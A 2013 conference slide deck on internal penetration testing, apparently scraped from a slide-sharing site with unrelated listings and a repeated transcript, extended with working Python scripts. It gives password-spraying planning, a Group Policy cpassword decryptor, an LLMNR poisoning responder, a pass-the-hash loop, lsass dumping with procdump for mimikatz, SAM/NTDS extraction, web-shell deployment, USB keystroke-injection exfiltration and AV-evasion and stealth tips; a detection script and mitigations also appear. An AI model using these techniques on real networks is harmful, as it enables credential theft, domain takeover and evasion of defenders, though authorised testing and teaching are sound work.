Why Internal Pen-Tests are still
FUN !
Why other pen-tests suck ! (not
hating)
• External – Unless you're SE'ing someone it's
pretty boring. (Nessus/Qualys-grepping human,
thou art l33t)
• Web Apps – Unless you get SQLi, file upload
or good business logic bugs. (Oh Burp
scanning/Intruder ninja, thou art l33t)
• Mobile – Unlimited fun, but limited by a small
attack surface
Internal Pen-Tests
• SHELLS! SHELLS! SHELLS! – Oh beautiful Shellness!
• Nothing beats the joy of popping a box !
• Local admin to Domain Admin – always a new
challenge!
• Data – Oh delicious customer data !
• Mad respect from client
“More pen-tests…more monnneeyyy” – Hans
Michael Varbaek
Why we still own Internal Networks
• Weak passwords – Welcome1 still works in
2013
• No patching – MS08-067 still works in 2013
• No access controls – RDP/SSH reachable from
anywhere
Easy Pwnage
• This stuff still works not because you're l33t but because
your customer is clueless about securing stuff.
– Password attacks
• SMB bruteforce from a list of domain users (enumerate them via
null sessions, or from a compromised host that gave you a domain
user cred)
• ^ Check the password policy (lockout threshold and observation
window) before going haywire.
• SSH, MSSQL etc. (sa/sa still works in 2013)
• Metasploit auxiliary modules / Nmap scripts are your best friend.
(You know most of the good ones, right?)
• Run all of them if you've got time. You never know how low the
fruit is hanging unless you bend down.
• Nessus/Qualys are generally pretty bad at bruteforcing stuff.
• Use intelligent word lists – mix in the company name
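The two habits above (read the lockout policy first, then build a company-flavoured list) as one script. This is an added example, not a tool from the talk: the net accounts output, the company name and the year are constructed, and the "margin" of spare attempts is my own convention.

```python
"""Lockout-aware password spraying: read the policy, then size the wordlist.

Added example, not code from the talk. The `net accounts /domain` output below
is constructed; on an engagement paste the real output (any domain user, or a
null session against the DC, can read it).
"""
import re
from itertools import product

# Constructed sample of `net accounts /domain` output.
SAMPLE_NET_ACCOUNTS = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          42
Minimum password length:                              7
Length of password history maintained:                24
Lockout threshold:                                    5
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        PRIMARY
"""

def parse_net_accounts(text):
    """Pull the lockout-relevant numbers out of `net accounts` output.

    Windows prints 'Never' for a threshold of 0, which means no lockout at all.
    """
    policy = {"threshold": 0, "window_min": 0, "min_length": 0}
    patterns = {
        "threshold": r"Lockout threshold:\s+(\S+)",
        "window_min": r"Lockout observation window \(minutes\):\s+(\S+)",
        "min_length": r"Minimum password length:\s+(\S+)",
    }
    for key, pat in patterns.items():
        m = re.search(pat, text)
        if m and m.group(1).isdigit():
            policy[key] = int(m.group(1))
    return policy

def build_wordlist(company, year, min_length=0):
    """'Intelligent' candidates: defaults, company name and seasons with the usual suffixes.

    Welcome1/Password1 go first because they hit most often; anything shorter than
    the policy minimum is dropped since it cannot be a valid password anyway.
    """
    bases = ["Welcome", "Password", company.capitalize(), company.lower(),
             "Summer", "Winter", "Spring", "Autumn"]
    suffixes = ["1", "123", "!", "1!", str(year), f"{year}!", str(year)[2:], ""]
    seen, out = set(), []
    for base, suf in product(bases, suffixes):
        pw = base + suf
        if len(pw) >= min_length and pw not in seen:
            seen.add(pw)
            out.append(pw)
    return out

def plan_spray(candidates, policy, margin=1):
    """Split candidates into rounds so no account reaches `threshold` failures in one window.

    Every user gets `per_round` guesses per round; wait one full observation window
    between rounds. `margin` leaves room for the user's own typos.
    Returns (per_round, wait_minutes, rounds).
    """
    threshold = policy["threshold"]
    if threshold == 0:                       # no lockout policy: spray freely
        return len(candidates), 0, [list(candidates)]
    per_round = max(threshold - 1 - margin, 1)
    rounds = [candidates[i:i + per_round] for i in range(0, len(candidates), per_round)]
    return per_round, policy["window_min"], rounds

if __name__ == "__main__":
    pol = parse_net_accounts(SAMPLE_NET_ACCOUNTS)
    words = build_wordlist("acme", 2013, pol["min_length"])
    per_round, wait, rounds = plan_spray(words, pol)
    print(f"{pol} -> {per_round} guesses per user per round, {wait} min between rounds")
    for i, r in enumerate(rounds, 1):
        print(f"round {i}: {r}")
```

Feed each round's passwords to whatever sprayer you use (Metasploit's smb_login, an SMB client in a loop) and sleep for the observation window between rounds; with a threshold of 5 and a margin of 1 that is three guesses per user every 30 minutes, which is slow but does not lock the whole company out of their mail.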
Easy Pwnage
– Not Patching
• Any vulnerable software that Qualys/Nessus finds – if Metasploit
has a module for it = easy win.
– Web consoles (I like these – find them all the time!)
• JBoss JMX console (deploy shell.war through the console and invoke it)
• Tomcat manager (deploy shell.war)
– These usually run as SYSTEM on a Windows box when installed as a service.
• Any file upload in an internal web app (don't waste time hunting for
this, but if you do see something interesting have a poke)
– GPO cpassword (Group Policy Preferences XML in SYSVOL)
• post/windows/gather/credentials/gpp – base64-decode and then
decrypt with the AES key Microsoft published in its own documentation
• Most likely the local administrator password (re-used across all hosts
that were deployed with that GPP)
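The decryption step, written out so it is clear why a published key makes cpassword worthless. This is an added example, not the Metasploit module's code: the AES-256 key is the one from Microsoft's MS-GPPREF specification, the sample cpassword is the value used in public write-ups of this weakness (not from any client), and AES-CBC is implemented inline only to keep the script dependency-free.

```python
"""Decrypt a Group Policy Preferences cpassword.

Added example, not code from the talk or from the Metasploit gpp module. The
32-byte AES key is the one Microsoft published in the MS-GPPREF specification,
which is why every cpassword sitting in SYSVOL is effectively plaintext.
AES-256-CBC decryption is written out in pure Python so the script needs no
third-party package; use a maintained crypto library in anything you keep.
"""
import base64

GPP_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")

# ---- minimal AES-256 inverse cipher (FIPS-197), decryption only ----------------
def _xtime(a):
    a <<= 1
    return a ^ 0x11B if a & 0x100 else a

def _mul(a, b):                                  # GF(2^8) multiplication
    r = 0
    while b:
        if b & 1:
            r ^= a
        a, b = _xtime(a), b >> 1
    return r

def _rotl8(x, n):
    return ((x << n) | (x >> (8 - n))) & 0xFF

def _build_sbox():                               # derive the S-box instead of typing 256 bytes
    sbox, p, q = [0] * 256, 1, 1
    while True:
        p = (p ^ (p << 1) ^ (0x1B if p & 0x80 else 0)) & 0xFF    # p *= 3
        q = (q ^ (q << 1)) & 0xFF                                # q /= 3
        q = (q ^ (q << 2)) & 0xFF
        q = (q ^ (q << 4)) & 0xFF
        if q & 0x80:
            q ^= 0x09
        sbox[p] = q ^ _rotl8(q, 1) ^ _rotl8(q, 2) ^ _rotl8(q, 3) ^ _rotl8(q, 4) ^ 0x63
        if p == 1:
            break
    sbox[0] = 0x63
    return sbox

SBOX = _build_sbox()
INV_SBOX = [SBOX.index(i) for i in range(256)]

def _expand_key(key):                            # 32-byte key -> 15 round keys of 16 bytes
    w = [list(key[i:i + 4]) for i in range(0, 32, 4)]
    rcon = 1
    for i in range(8, 60):
        t = list(w[i - 1])
        if i % 8 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]
            t[0] ^= rcon
            rcon = _xtime(rcon)
        elif i % 8 == 4:
            t = [SBOX[b] for b in t]
        w.append([w[i - 8][j] ^ t[j] for j in range(4)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(15)]

def _decrypt_block(round_keys, block):
    s = [b ^ k for b, k in zip(block, round_keys[14])]
    for rnd in range(13, -1, -1):
        s = [s[r + 4 * ((c - r) % 4)] for c in range(4) for r in range(4)]  # InvShiftRows
        s = [INV_SBOX[b] for b in s]                                        # InvSubBytes
        s = [b ^ k for b, k in zip(s, round_keys[rnd])]                     # AddRoundKey
        if rnd:                                                             # InvMixColumns
            out = []
            for c in range(4):
                a0, a1, a2, a3 = s[4 * c:4 * c + 4]
                out += [_mul(a0, 14) ^ _mul(a1, 11) ^ _mul(a2, 13) ^ _mul(a3, 9),
                        _mul(a0, 9) ^ _mul(a1, 14) ^ _mul(a2, 11) ^ _mul(a3, 13),
                        _mul(a0, 13) ^ _mul(a1, 9) ^ _mul(a2, 14) ^ _mul(a3, 11),
                        _mul(a0, 11) ^ _mul(a1, 13) ^ _mul(a2, 9) ^ _mul(a3, 14)]
            s = out
    return bytes(s)

def aes256_cbc_decrypt(key, iv, data):
    rk, prev, out = _expand_key(key), iv, b""
    for i in range(0, len(data), 16):
        blk = data[i:i + 16]
        out += bytes(p ^ c for p, c in zip(_decrypt_block(rk, blk), prev))
        prev = blk
    return out

# ---- the GPP-specific part ------------------------------------------------------
def decrypt_cpassword(cpassword):
    """cpassword -> cleartext: re-pad base64, AES-256-CBC with zero IV, strip PKCS#7, UTF-16LE."""
    raw = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
    plain = aes256_cbc_decrypt(GPP_KEY, b"\x00" * 16, raw)
    plain = plain[:-plain[-1]]                   # PKCS#7 padding
    return plain.decode("utf-16-le")

if __name__ == "__main__":
    # Sample value from public write-ups of this issue, not from a real client.
    print(decrypt_cpassword("j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"))
```

Grep \\<domain>\SYSVOL for cpassword= in Groups.xml, Services.xml, ScheduledTasks.xml and DataSources.xml; the base64 value has its trailing = characters stripped, which is why the padding is re-added before decoding. Note the zero IV and PKCS#7 padding are part of the format, not choices of this script.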
Easy Pwnage
Filebrowser -> when cmd.jsp gets picked up by AV
http://www.vonloesch.de/filebrowser.html
Easy Pwnage
Filebrowser
Laudanum
• http://sourceforge.net/projects/laudanum/files/laudanum-0.8/
• Bunch of good web shells for most languages
Why are we doing all this anyway ??
• Get sensitive data and show the customer the real
risk of letting “Mr. Evil” connect to their
internal network
– Hunting for data :
• Local admin -> Domain Admin -> Search for data
everywhere (usually databases – unless they're really
stupid and store it in unencrypted flat files)
Lesson learnt – Some clients don’t even know what
data is important to them.
- CEO’s Mailbox is a good start
Super Secure Customer
• Everything is patched
• Super random awesomely strong passwords
• Apps are secure coded – no SQLi and no file
upload
• AV everywhere – I mean everywhere
• ^ AV can't be turned off unless you provide a
password
• OMG ! – I should quit pen-testing.
Responder
• Developed by Laurent Gaffié (Trustwave)
• LLMNR and NBT-NS poisoning (Google these if you don't know them)
– When DNS and the hosts file fail to resolve a name, Windows
falls back to asking the whole subnet (LLMNR multicast, NBT-NS
broadcast). The tool yells out "I'll resolve that for you", the
victim connects to you and you capture its NTLM challenge-response.
– DEMO
– Captured NTLMv2 responses can be cracked with John (they are
challenge-responses, so no pass-the-hash with these), or the
authentication can be relayed to another host:
http://pen-testing.sans.org/blog/pen-testing/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python
Responder
• Tons of other features
– Google “responder trustwave”
– Does ICMP redirect (this is effing awesome – but only
works on anything older than Vista/2k8)
– Abuses WPAD (another kool feature)
– HTTP, FTP module.
• Make sure you are on a workstation subnet for
maximum hits.
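What the poisoning looks like on the wire, as an added example (this is not Responder's code, and the query, names, transaction ID and IP addresses are constructed). LLMNR is a DNS-format packet sent to multicast 224.0.0.252 on UDP 5355 whenever DNS and the hosts file come up empty; whoever answers first with the matching transaction ID wins the name.

```python
"""LLMNR poisoning on the wire (added example, not Responder's code).

A Windows host that cannot resolve a name via DNS or the hosts file multicasts
an LLMNR query (RFC 4795) to 224.0.0.252:5355. Any host on the subnet may answer,
so a poisoner replies with its own address; the victim then connects to it over
SMB/HTTP and hands over an NTLM challenge-response. The query built below is
constructed; names, IPs and the transaction ID are illustrative.
"""
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355

def _encode_name(name):
    out = b""
    for label in name.strip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"

def _decode_name(data, offset):
    labels = []
    while True:
        length = data[offset]
        offset += 1
        if length == 0:
            break
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), offset

def build_llmnr_query(txid, name, qtype=1):
    """What a Windows host emits for a failed lookup of `name` (qtype 1 = A record)."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)   # id, flags, QD, AN, NS, AR
    return header + _encode_name(name) + struct.pack("!HH", qtype, 1)

def parse_llmnr_query(data):
    """Return (txid, name, qtype) for a standard query, or None for anything else."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", data[:12])
    if flags & 0x8000 or qd != 1:        # a response, or not exactly one question
        return None
    name, off = _decode_name(data, 12)
    qtype, qclass = struct.unpack("!HH", data[off:off + 4])
    if qclass != 1:                      # only class IN
        return None
    return txid, name, qtype

def build_poisoned_response(query, attacker_ip, ttl=30):
    """Answer an A query with the attacker's IP: same txid, QR bit set, one answer RR."""
    parsed = parse_llmnr_query(query)
    if parsed is None or parsed[2] != 1:
        return None
    txid, name, _ = parsed
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)
    question = _encode_name(name) + struct.pack("!HH", 1, 1)
    rdata = bytes(int(o) for o in attacker_ip.split("."))
    answer = _encode_name(name) + struct.pack("!HHIH", 1, 1, ttl, 4) + rdata
    return header + question + answer

if __name__ == "__main__":
    # Constructed: a workstation fat-fingers \\fileserv and asks the subnet who that is.
    q = build_llmnr_query(0x1337, "fileserv")
    print(parse_llmnr_query(q))
    print(build_poisoned_response(q, "10.0.0.99").hex())
```

To actually send it you bind a UDP socket to port 5355, join the multicast group with IP_ADD_MEMBERSHIP and write the response back to the querying host's source port; the victim then tries \\10.0.0.99 and authenticates. The corresponding fix is the flip side of the same packet: turn multicast name resolution off by GPO and disable NetBIOS over TCP/IP on the adapters, and there is nothing left to answer.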
OK – THAT DIDN'T WORK??
• Give up and go home ??
I SAY NO !
• Meet the angry, I will pwn you pentester !
Get your Ducky on
• HID USB thingy with a small programmable chip – the OS
sees a keyboard.
• When a user leaves a desktop/laptop unlocked, run over and
plug it in (or walk if you're not that enthusiastic).
• Quickly add a user, enable RDP, grab password hashes,
system info etc. and ship it to your FTP server. (Whatever
privs the user has, the Ducky has.)
• Easy to write scripts – write, compile with the Java encoder,
load onto the Ducky.
• ^ Way easier than Teensy – although Teensy can be
used for stealth/SE tactics: Teensy inside a mouse, Teensy
inside a keyboard etc.
DUCKY DEMO
• If it quacks like a duck – it must be a duck
• Video
SAFE PASSWORD DUMPING
• Old school password dumping tools get picked
up by AV (Cain, pwdump etc.)
• Newer ones are getting picked up as well (WCE,
mimikatz etc.) – these two can dump plain-
text passwords from memory.
• Disable AV ?
• What if AV can only be disabled using a
password ?
SAFE PASSWORD DUMPING
• You don't have to disable AV or trigger it.
• Procdump from Sysinternals (a signed Microsoft
binary, so AV leaves it alone):
– C:\windows\temp\procdump.exe -accepteula -ma
lsass.exe C:\windows\temp\lsassdump.dmp
– Mimikatz can then chew the .dmp file offline and spit out
passwords in clear text.
SAFE PASSWORD DUMPING
• Some old methods still work and don't get
picked up by AV – hashes from hives:
• Reg copy (C:\>reg.exe save HKLM\SAM sam and
C:\>reg.exe save HKLM\SYSTEM system – the SAM is
useless without the boot key from the SYSTEM hive)
• Shadow volume copy (good for grabbing NTDS.dit off
a DC – take the SYSTEM hive with it)
• ^ Ops guys now check logs for shadow
volume copies, so I'd recommend using
SAMEX.
(http://www.josho.org/blog//blog/2013/03/07/samex/)
Searching for Domain Admin
• So you popped a few boxes - got some hashes
• What now ?
• If one of those boxes :
– had a domain admin logged in – you have his
password in plain-text or got his hash -> game over.
– had a service running as domain admin – move to
process, pop shell -> game over.
• Shares the same local administrator password
with the rest of the network:
– Spray the hash and look for boxes with processes
running as domain admin.
Searching for Domain Admin
#!/bin/sh
# Spray one local admin hash across every host in ip.txt and see who is running what.
# Needs the pass-the-hash build of winexe (pth-winexe); the hash is given as LMHASH:NTHASH.
while read -r ip; do
  ./winexe -U 'Administrator%passwordhash' "//$ip" "ipconfig"
  ./winexe -U 'Administrator%passwordhash' "//$ip" "tasklist /v"
done < ip.txt
• ^ The Metasploit module auxiliary/admin/smb/psexec_command
also works. Do not use exploit/windows/smb/psexec, as it uploads
an exe to the box and will trigger AV.
• Log in to the box running the domain admin process – dump the hash
or read the password from lsass in plain text.
• Replay the hash, or log in as domain admin over RDP etc.
• Game over.
– Pro Stealth tip : Once you get a domain admin shell DO NOT
CREATE a new domain admin user.
• This will trigger Ops as a lot of organisations are alerted if a new
domain administrator is created.
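Once the spray loop has collected tasklist output from a few dozen hosts you want something to pick out the ones worth logging into. The following is an added example, not a tool from the talk: it parses the CSV form of tasklist (tasklist /v /fo csv, which is easier to parse than the default columns) and matches the User Name column against a list of privileged accounts. The two hosts' outputs, the account names and the DA list are constructed.

```python
"""Find hosts where a Domain Admin has a process (added example, not from the talk).

Feed it the `tasklist /v /fo csv` output collected per host by the spray loop
(psexec_command or winexe). The sample output below is constructed; host names,
users and the privileged-account list are illustrative.
"""
import csv
import io

# Constructed: abbreviated `tasklist /v /fo csv` output from two hosts.
SAMPLE_OUTPUT = {
    "10.0.0.21": '''"Image Name","PID","Session Name","Session#","Mem Usage","Status","User Name","CPU Time","Window Title"
"System Idle Process","0","Services","0","24 K","Unknown","NT AUTHORITY\\SYSTEM","0:00:00","N/A"
"svchost.exe","812","Services","0","9,800 K","Unknown","NT AUTHORITY\\NETWORK SERVICE","0:00:01","N/A"
"explorer.exe","2040","Console","1","45,120 K","Running","CORP\\jsmith","0:00:12","N/A"
''',
    "10.0.0.37": '''"Image Name","PID","Session Name","Session#","Mem Usage","Status","User Name","CPU Time","Window Title"
"svchost.exe","804","Services","0","9,500 K","Unknown","NT AUTHORITY\\SYSTEM","0:00:01","N/A"
"backupagent.exe","1488","Services","0","30,200 K","Unknown","CORP\\svc_backup","0:04:10","N/A"
"mmc.exe","3120","RDP-Tcp#1","2","60,010 K","Running","CORP\\da.alice","0:00:03","Active Directory Users and Computers"
''',
}

def parse_tasklist_csv(text):
    """Yield (image, pid, user) for every row of `tasklist /v /fo csv` output."""
    for row in csv.DictReader(io.StringIO(text)):
        yield row["Image Name"], int(row["PID"]), row["User Name"]

def find_privileged_processes(outputs, privileged):
    """Map host -> processes owned by any account in `privileged` (DOMAIN\\user, case-insensitive).

    Service accounts that are members of Domain Admins count just as much as a
    logged-in human: the talk's 'service running as domain admin' case.
    """
    wanted = {p.lower() for p in privileged}
    hits = {}
    for host, text in outputs.items():
        for image, pid, user in parse_tasklist_csv(text):
            if user.lower() in wanted:
                hits.setdefault(host, []).append((image, pid, user))
    return hits

if __name__ == "__main__":
    # Constructed DA list; on an engagement take it from `net group "Domain Admins" /domain`.
    das = ["CORP\\da.alice", "CORP\\svc_backup"]
    for host, procs in find_privileged_processes(SAMPLE_OUTPUT, das).items():
        for image, pid, user in procs:
            print(f"{host}: {image} (pid {pid}) runs as {user}")
```

Only 10.0.0.37 comes back: one DA with an interactive RDP session (password likely sitting in lsass) and one service account that is in the DA list, which is the process you migrate into.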
Looting
• Go after SQL servers – you should have a list of these from your scans
• Shares – yes, people still store heaps of confidential stuff unencrypted on
shares
• Have you guys seen Firefox PTH? – All ur OWA and SharePoint r belong 2
us!
• Metasploit post-exploitation modules – store loot in the MSF DB for
grepping later.
Firefox PTH
• DEMO
• https://code.google.com/p/passing-the-hash/downloads/list
Mitigations
• You can't really stop a determined attacker
• There are just way too many ways you could get
hacked
• Best bet is to detect
• Check for anomalies – new user creation (DA etc.), local
admin logons, AV pickups etc.
• User education
• Google's new network architecture – all zones are untrusted
(not a bad idea, eh?)
• Obvious old school protections should still apply –
patching, strong passwords, access controls etc.
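The "check for anomalies" bullet, turned into detection logic that would have caught most of the earlier slides. This is an added example, not something from the talk: events are dicts with the fields a SIEM extracts from the Security log (the event IDs are the real Windows ones), while the sample events, the DA list, the jump-host address and the spray threshold are all constructed.

```python
"""Detection logic for the anomalies the talk says to watch.

Added example, not from the talk. Events are dicts with the fields a SIEM would
extract from the Windows Security log (and Defender's operational log); every
sample event, account, IP and host below is constructed. The event IDs are the
real ones: 4720 account created, 4728/4732 member added to a security-enabled
global/local group, 4624 logon (type 3 network, type 10 RDP), 1116 Defender detection.
"""
from collections import defaultdict

DOMAIN_ADMINS = {"corp\\da.alice", "corp\\da.bob"}       # from `net group "Domain Admins"`
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}
JUMP_HOSTS = {"10.0.0.5"}                                 # where DA logons are expected from

# Constructed: a tester adds a DA, sprays the shared local Administrator hash, trips AV.
SAMPLE_EVENTS = [
    {"id": 4720, "subject": "CORP\\da.alice", "target": "CORP\\pentest_da", "host": "DC01"},
    {"id": 4728, "subject": "CORP\\da.alice", "target": "CORP\\pentest_da",
     "group": "Domain Admins", "host": "DC01"},
    {"id": 4624, "target": "Administrator", "logon_type": 3, "src": "10.0.0.99", "host": "WS-0021"},
    {"id": 4624, "target": "Administrator", "logon_type": 3, "src": "10.0.0.99", "host": "WS-0037"},
    {"id": 4624, "target": "Administrator", "logon_type": 3, "src": "10.0.0.99", "host": "WS-0044"},
    {"id": 4624, "target": "CORP\\da.alice", "logon_type": 10, "src": "10.0.0.5", "host": "DC01"},
    {"id": 4624, "target": "CORP\\da.alice", "logon_type": 10, "src": "10.0.0.99", "host": "SQL02"},
    {"id": 1116, "host": "WS-0021", "threat": "HackTool:Win32/Mimikatz",
     "path": "C:\\Windows\\Temp\\m.exe"},
]

def detect(events, spray_threshold=3):
    """Return one alert string per anomaly.

    - any account creation and any addition to a privileged group
    - a DA interactive/RDP logon from anything but a jump host
    - one source reaching `spray_threshold` or more hosts as local Administrator over
      the network (the hash-spray loop, seen from the logs' point of view)
    - any AV detection, since a tester who can't disable AV will trip it eventually
    """
    alerts = []
    admin_spray = defaultdict(set)           # source IP -> hosts reached as Administrator
    for e in events:
        eid = e["id"]
        if eid == 4720:
            alerts.append(f"account {e['target']} created by {e['subject']} on {e['host']}")
        elif eid in (4728, 4732) and e.get("group") in PRIVILEGED_GROUPS:
            alerts.append(f"{e['target']} added to {e['group']} by {e['subject']} on {e['host']}")
        elif eid == 4624:
            user, ltype, src = e["target"].lower(), e["logon_type"], e["src"]
            if user == "administrator" and ltype == 3:
                admin_spray[src].add(e["host"])
            elif user in DOMAIN_ADMINS and ltype in (2, 10) and src not in JUMP_HOSTS:
                alerts.append(f"DA {e['target']} logon type {ltype} to {e['host']} "
                              f"from non-jump host {src}")
        elif eid == 1116:
            alerts.append(f"AV detection on {e['host']}: {e['threat']} at {e['path']}")
    for src, hosts in admin_spray.items():
        if len(hosts) >= spray_threshold:
            alerts.append(f"local Administrator network logons from {src} "
                          f"to {len(hosts)} hosts: {sorted(hosts)}")
    return alerts

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print("ALERT:", a)
```

The spray rule needs the 4624 events from every workstation, not just the DCs, so it only works if workstation logs are forwarded centrally; the group-membership rule fires on the DC alone, which is why the "don't create a new DA" stealth tip above exists.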
Testing “Pro” tips
• Don't leave any accounts you create on the customer's network – delete
everything (finding a DA account left by the pen-tester from the last engagement = fail)
• Bruteforce wisely – locking out an important service will not go down well
with a customer (bump down threads = increase stealth)
• Don't disable AV – intelligent Ops are alerted if AV dies
• Wipe your VM after every pen-test – a clean slate to work on is so much
better
• Snapshotting with all your tools set up and then resetting also works
• The script command on Linux (it logs everything typed and printed in a
terminal session) is your best friend
• Notes – always good for other eyes trying to read and understand what
you did (doesn't even have to be fancy – vi or Notepad works)
• Videos for complex attacks – I'd highly recommend it (mind you, this is
gonna eat some disk space and sending it to a client might be difficult)
Music (Ignore slide if you don’t listen to
music)
• Meshuggah, Lamb of God and Tool – when you're
feeling effing awesome and pwning like a
baws
• Trying really hard for a breakthrough or
fighting a problem – really fast techno or
dubstep
• When you lose it and wanna break your
laptop – Vitamin String Quartet (trust me, this
works)
That’s it
• Things I want to work on (any help will earn beers
and respect):
– Write more ducky scripts (hopefully run faster and
grab more stuff, reverse shell etc)
– Write post exploit modules (which can loot more
efficiently)
– Set up a Pi that can do all this over 3G/4G, to be sent to the
client so I can watch BSG and sip beer.
– Hope this helped. Google for anything that I may have
not provided a link or explained in detail
Blog: http://psychsec.wordpress.com/

2024 eCommerceDays Toulouse - Sylius 2.0.pdf2024 eCommerceDays Toulouse - Sylius 2.0.pdf
2024 eCommerceDays Toulouse - Sylius 2.0.pdf
 
Launch Your Streaming Platforms in Minutes
Launch Your Streaming Platforms in MinutesLaunch Your Streaming Platforms in Minutes
Launch Your Streaming Platforms in Minutes
 
Top Features to Include in Your Winzo Clone App for Business Growth (4).pptx
Top Features to Include in Your Winzo Clone App for Business Growth (4).pptxTop Features to Include in Your Winzo Clone App for Business Growth (4).pptx
Top Features to Include in Your Winzo Clone App for Business Growth (4).pptx
 
APIs for Browser Automation (MoT Meetup 2024)
APIs for Browser Automation (MoT Meetup 2024)APIs for Browser Automation (MoT Meetup 2024)
APIs for Browser Automation (MoT Meetup 2024)
 
Quarkus Hidden and Forbidden Extensions
Quarkus Hidden and Forbidden ExtensionsQuarkus Hidden and Forbidden Extensions
Quarkus Hidden and Forbidden Extensions
 
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdf
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdfAutomated software refactoring with OpenRewrite and Generative AI.pptx.pdf
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdf
 
E-commerce Application Development Company.pdf
E-commerce Application Development Company.pdfE-commerce Application Development Company.pdf
E-commerce Application Development Company.pdf
 

Why internal pen tests are still fun

  • 1. Why Internal Pen-Tests are still FUN !
  • 2. Why other pen-tests suck ! (not hating)
    • External – Unless you’re SE’ing someone it’s pretty boring. (nessus/qualys grepping human thou art l33t)
    • Web Apps – Unless you get SQLi or file upload or good business logic bugs. (Oh burp scanning/intruder ninja thou art l33t)
    • Mobile – Fun unlimited but limited by small threat surface
  • 3. Internal Pen-Tests
    • SHELLS! SHELLS! SHELLS! – Oh beautiful Shellness!
    • Nothing beats the joy of popping a box !
    • If Local Admin, get Domain Admin – always a new challenge !
    • Data – Oh delicious customer data !
    • Mad respect from client
    “More pen-tests…more monnneeyyy” – Hans Michael Varbaek
  • 4. Why we still own Internal Networks
    • Weak passwords – Welcome1 still works in 2013
  • 5. Why we still own Internal Networks
    • No patching – MS08-067 still works in 2013
  • 6. Why we still own Internal Networks
    • No access controls – RDP/SSH anywhere
  • 7. Easy Pwnage
    • This stuff still works not because you’re l33t but because your customer is clueless about securing stuff.
    – Password attacks
      • SMB bruteforce from a list of domain users (null sessions or using a compromised host that gave you a domain user cred)
      • ^ check the password policy before going haywire.
      • SSH, MSSQL etc (sa,sa still works in 2013)
      • Metasploit auxiliary modules / Nmap scripts are your best friend. (you know most of the good ones r8 ?)
      • Run all of them if you’ve got time. You never know how low the fruit is hanging unless you bend down.
      • Nessus/Qualys generally are pretty bad at bruteforcing stuff.
      • Use intelligent word lists – mix in the company name
  • 8. Easy Pwnage
    – Not Patching
      • Any vulnerable software that Qualys/Nessus finds – if Metasploit has a module for it = easy win.
    – Web consoles (I like these – find them all the time!)
      • JBoss JMX consoles (setup shell.war and invoke)
      • Tomcat manager (deploy shell.war)
      – These usually run as SYSTEM on a Windows box.
      • Any file upload from a web app that is internal (Don’t waste time on this, if you do see something interesting have a poke)
    – GPO cpassword (Group Policy Preference XML)
      • post/windows/gather/credentials/gpp – base64-decode and then decrypt using the MS-provided public AES key
      • Most likely the local administrator password (re-used across all hosts that were deployed with GPPs)
  • 9. Easy Pwnage
    • Filebrowser -> when cmd.jsp gets picked up by AV: http://www.vonloesch.de/filebrowser.html
  • 13. Why are we doing all this anyway ??
    • Get sensitive data and show the customer the real risk of allowing “Mr.Evil” to connect to their internal network
    – Hunting for data :
      • Local admin -> Domain Admin -> Search for data everywhere (usually databases – unless they’re really stupid and store it in unencrypted flat files)
    • Lesson learnt – Some clients don’t even know what data is important to them. – CEO’s Mailbox is a good start
  • 14. Super Secure Customer
    • Everything is patched
    • Super random awesomely strong passwords
    • Apps are securely coded – no SQLi and no file upload
    • AV everywhere – I mean everywhere
    • ^ AV can’t be turned off unless you provide a password
    • OMG ! – I should quit pen-testing.
  • 16. Responder
    • Developed by Laurent Gaffié (Trustwave)
    • LLMNR and NBT-NS poisoning (Google for what this is)
    – If DNS and the hosts file fail, the tool yells out saying “I’ll resolve that for you” and then steals your creds !
    – DEMO
    – Hashes can be cracked via John or can be relayed: http://pen-testing.sans.org/blog/pen-testing/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python
  • 17. Responder
    • Tons of other features – Google “responder trustwave”
    – Does ICMP re-direct (this is effing awesome – but only works for anything older than Vista/2k8)
    – Abuse WPAD (Another kool feature)
    – HTTP, FTP module.
    • Make sure you are on a workstation subnet for maximum hits.
  • 18. OK – THAT DIDN’T WORK ??
    • Give up and go home ??
  • 19. I SAY NO !
    • Meet the angry, I-will-pwn-you pentester !
  • 20. Get your Ducky on
    • HID usb thingy that has a small programmable chip.
    • When a user leaves their desktop/laptop unlocked, run and connect. (or walk if you’re not that enthusiastic)
    • Quickly add user, enable rdp, grab password hashes, system info etc and ship to ur ftp server. (whatever privs the user has – ducky has)
    • Easy to write scripts – write, compile with java, load onto Ducky.
    • ^ Way easier than teensy – Although teensy can be used in stealth/SE tactics. Teensy inside mouse, teensy inside keyboard etc.
  • 21. DUCKY DEMO
    • If it quacks like a duck – it must be a duck
    • Video
  • 22. SAFE PASSWORD DUMPING
    • Old school password dumping tools get picked up by AV (cain, pwdump etc)
    • New ones are getting picked up as well (WCE, mimikatz etc)
    – These two can dump plain-text passwords from memory.
    • Disable AV ?
    • What if AV can only be disabled using a password ?
  • 23. SAFE PASSWORD DUMPING
    • You don’t have to disable AV or trigger it.
    • Procdump from sysinternals
      – C:\windows\temp\procdump.exe -accepteula -ma lsass.exe C:\windows\temp\lsassdump.dmp
      – Mimikatz can then chew the .dmp file and spit out passwords in clear text.
  • 24. SAFE PASSWORD DUMPING
    • Some old methods still work and don’t get picked up by AV – hashes from hives:
      • Reg copy (C:\>reg.exe save HKLM\SAM sam)
      • Shadow volume copy (good to grab NTDS)
